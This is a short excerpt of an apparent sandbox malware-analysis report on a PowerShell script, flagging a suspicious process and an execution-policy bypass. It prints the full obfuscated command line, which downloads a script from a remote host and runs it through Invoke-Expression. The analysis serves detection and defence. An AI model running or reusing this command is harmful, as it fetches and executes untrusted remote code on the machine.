parent_process	powershell.exe				martian_process	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ex unrestricted -c Set-Item Variable:/Ce ([Net.WebClient]::New());Set-Variable 7 'https://q.cylinderacronym.top/hpkekeyconfig';(Get-Variable Ce -ValueOn).(((([Net.WebClient]::New()\|Member)\|?{$_.Name -like'nlg'}).Name))((Variable 7 -Val))\|&(Alias I*X)

Creates a suspicious Powershell process (2 events)

option	-ex unrestricted				value	Attempts to bypass execution policy
option	-ex unrestricted				value	Attempts to bypass execution policy

hpkekeyconfig.txt.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All